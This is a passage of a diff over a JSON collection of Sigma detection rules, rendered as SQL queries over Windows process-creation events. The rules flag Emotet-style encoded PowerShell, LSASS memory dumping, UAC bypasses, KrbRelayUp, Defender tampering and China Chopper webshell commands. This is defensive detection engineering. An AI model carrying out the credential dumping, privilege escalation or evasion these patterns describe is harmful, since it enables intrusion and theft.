"E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.collection", + "attack.t1123" ], "falsepositives": [ - "Unknown" + "Legitimate audio capture by legitimate user." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%WindowsAudioDevice-Powershell-Cmdlet%' ESCAPE '\\' OR CommandLine LIKE '%Toggle-AudioDevice%' ESCAPE '\\' OR CommandLine LIKE '%Get-AudioDevice %' ESCAPE '\\' OR CommandLine LIKE '%Set-AudioDevice %' ESCAPE '\\' OR CommandLine LIKE '%Write-AudioDevice %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" + "filename": "proc_creation_win_powershell_audio_capture.yml" }, { - "title": "Potential Persistence Attempt Via Run Keys Using Reg.EXE", - "id": "de587dce-915e-4218-aac4-835ca6af6f70", - "status": "test", - "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", + "title": "Potential Emotet Activity", + "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", + "status": "stable", + "description": "Detects all Emotet like process executions that are not covered by the more generic rules", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", - "Legitimate administrator sets up autorun keys for legitimate reasons.", - "Discord" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\' AND CommandLine LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_add_run_key.yml" + "filename": "proc_creation_win_malware_emotet.yml" }, { - "title": "Password Provided In Command Line Of Net.EXE", - "id": "d4498716-1d52-438f-8084-4a603157d131", + "title": "LSASS Memory Dumping", + "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", "status": "test", - "description": "Detects a when net.exe is called with a password in the command line", - "author": "Tim Shelton (HAWK.IO)", + "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '%:%\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%/USER:% %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% ' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_use_password_plaintext.yml" + "filename": "proc_creation_win_susp_lsass_dump.yml" }, { - "title": "Abusing IEExec To Download Payloads", - "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", + "title": "Python Spawning Pretty TTY on Windows", + "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", "status": "experimental", - "description": "Detects execution of the IEExec utility to download payloads", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects python spawning a pretty tty", + "author": "Nextron Systems", + "tags": [ + "attack.execution", + "attack.t1059" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%python.exe' ESCAPE '\\' OR NewProcessName LIKE '%python3.exe' ESCAPE '\\' OR NewProcessName LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ieexec_download.yml" + "filename": "proc_creation_win_python_pty_spawn.yml" }, { - "title": "Recon Information for Export with Command Prompt", - "id": "aa2efee7-34dd-446e-8a37-40790a66efd7", - "status": "experimental", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "author": "frack113", + "title": "Potential LethalHTA Technique Execution", + "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "status": "test", + "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", + "author": "Markus Neis", "tags": [ - "attack.collection", - "attack.t1119" + "attack.defense_evasion", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tree.com' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\doskey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') OR OriginalFileName IN ('wmic.exe', 'DOSKEY.EXE', 'sc.exe')) AND (ParentCommandLine LIKE '% > \\%TEMP\\%\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\%TMP\\%\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_recon.yml" + "filename": "proc_creation_win_mshta_lethalhta_technique.yml" }, { - "title": "Powershell Token Obfuscation - Process Creation", - "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", + "title": "Potential Suspicious Windows Feature Enabled - ProcCreation", + "id": "c740d4cf-a1e9-41de-bb16-8a46a4f57918", "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.009" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the features listed in the rule." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND CommandLine LIKE '%-Online%' ESCAPE '\\' AND CommandLine LIKE '%-FeatureName%' ESCAPE '\\' AND (CommandLine LIKE '%TelnetServer%' ESCAPE '\\' OR CommandLine LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR CommandLine LIKE '%TFTP%' ESCAPE '\\' OR CommandLine LIKE '%SMB1Protocol%' ESCAPE '\\' OR CommandLine LIKE '%Client-ProjFS%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_token_obfuscation.yml" + "filename": "proc_creation_win_powershell_enable_susp_windows_optional_feature.yml" }, { - "title": "File Download with Headless Browser", - "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "title": "PUA - Radmin Viewer Utility Execution", + "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", "status": "test", - "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", - "author": "Sreeman, Florian Roth", + "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.lateral_movement", + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" ], - "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" + "filename": "proc_creation_win_pua_radmin.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - Process", - "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "title": "HackTool - F-Secure C3 Load by Rundll32", + "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", + "author": "Alfie Champion (ajpc500)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" }, { - "title": "Use NTFS Short Name in Image", - "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", + "title": "HackTool - KrbRelayUp Execution", + "id": "12827a56-61a4-476a-a9cb-f3068f191073", "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%~1.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~1.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~1.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~1.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~1.js%' ESCAPE '\\' OR NewProcessName LIKE '%~1.hta%' ESCAPE '\\' OR NewProcessName LIKE '%~2.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~2.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~2.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~2.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~2.js%' ESCAPE '\\' OR NewProcessName LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentProcessName LIKE '%-installer.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" + "filename": "proc_creation_win_hktl_krbrelayup.yml" }, { - "title": "Chopper Webshell Process Pattern", - "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", - "status": "experimental", - "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", - "author": "Florian Roth (Nextron Systems), MSTI (query)", + "title": "File Download with Headless Browser", + "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "status": "test", + "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", + "author": "Sreeman, Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_webshell_chopper.yml" + "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" }, { - "title": "XSL Script Processing", - "id": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", + "title": "Potential Arbitrary File Download Via MSEdge.EXE", + "id": "94771a71-ba41-4b6e-a757-b531372eaab6", "status": "test", - "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects usage of the \"msedge.exe\" binary as a LOLBIN to download arbitrary file via the CLI", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1220" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.", - "Msxsl.exe is not installed by default, so unlikely.", - "Static format arguments - https://petri.com/command-line-wmi-part-3" + "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%/format%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%/Format:List%' ESCAPE '\\' OR CommandLine LIKE '%/Format:htable%' ESCAPE '\\' OR CommandLine LIKE '%/Format:hform%' ESCAPE '\\' OR CommandLine LIKE '%/Format:table%' ESCAPE '\\' OR CommandLine LIKE '%/Format:mof%' ESCAPE '\\' OR CommandLine LIKE '%/Format:value%' ESCAPE '\\' OR CommandLine LIKE '%/Format:rawxml%' ESCAPE '\\' OR CommandLine LIKE '%/Format:xml%' ESCAPE '\\' OR CommandLine LIKE '%/Format:csv%' ESCAPE '\\'))) OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR OriginalFileName = 'msedge.exe') AND (CommandLine LIKE '%.exe http%' ESCAPE '\\' OR CommandLine LIKE '%msedge http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_xsl_script_processing.yml" + "filename": "proc_creation_win_browsers_msedge_arbitrary_download.yml" }, { - "title": "Tor Client/Browser Execution", - "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", - "status": "test", - "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", - "author": "frack113", + "title": "Tamper Windows Defender Remove-MpPreference", + "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", + "status": "experimental", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\tor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_browsers_tor_execution.yml" + "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" }, { - "title": "NodejsTools PressAnyKey Lolbin", - "id": "a20391f8-76fb-437b-abc0-dba2df1952c6", + "title": "UAC Bypass WSReset", + "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", "status": "test", - "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Other tools with the same command line flag combination", - "Legitimate uses as part of Visual Studio development" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Microsoft.NodejsTools.PressAnyKey.exe normal %' ESCAPE '\\' OR (CommandLine LIKE '%.exe normal %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\Microsoft\\\\NodeJsTools\\\\NodeJsTools%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_lolbin_pressaynkey.yml" + "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" }, { - "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", - "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "title": "PUA - Process Hacker / System Informer Execution", + "id": "811e0002-b13b-4a15-9d00-a613fce66e42", "status": "experimental", - "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], "falsepositives": [ - "Case in which administrators are allowed to use ScreenConnect's Backstage mode" + "Sometimes used by developers or system administrators for debugging purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" + "filename": "proc_creation_win_pua_process_hacker.yml" }, { - "title": "Wlrmdr Lolbin Use as Launcher", - "id": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", + "title": "Suspicious Electron Application Child Processes", + "id": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", "status": "experimental", - "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", - "author": "frack113, manasmbellani", + "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR (((NewProcessName LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR OriginalFileName = 'WLRMNDR.EXE') AND (CommandLine LIKE '%-s %' ESCAPE '\\' AND CommandLine LIKE '%-f %' ESCAPE '\\' AND CommandLine LIKE '%-t %' ESCAPE '\\' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\') OR (ParentProcessName = '-')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\Teams.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\slack.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\discord.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR 